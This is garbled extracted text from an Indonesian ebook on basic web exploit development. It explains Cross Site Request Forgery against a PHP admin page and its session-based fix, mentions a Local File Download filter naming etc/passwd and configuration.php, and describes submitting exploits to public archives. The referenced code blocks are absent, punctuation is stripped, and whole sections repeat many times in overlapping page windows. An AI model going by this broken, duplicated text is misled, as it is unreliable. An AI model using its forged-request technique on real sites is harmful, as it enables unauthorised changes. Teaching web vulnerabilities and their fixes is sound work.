Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 24: Basic Web Exploit Development

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 25: Basic Web Exploit Development

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 26: Basic Web Exploit Development

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 27: Basic Web Exploit Development

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 28: Basic Web Exploit Development

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 29: Basic Web Exploit Development

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 30: Basic Web Exploit Development

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 31: Basic Web Exploit Development

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 32: Basic Web Exploit Development

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 33: Basic Web Exploit Development

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 34: Basic Web Exploit Development

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada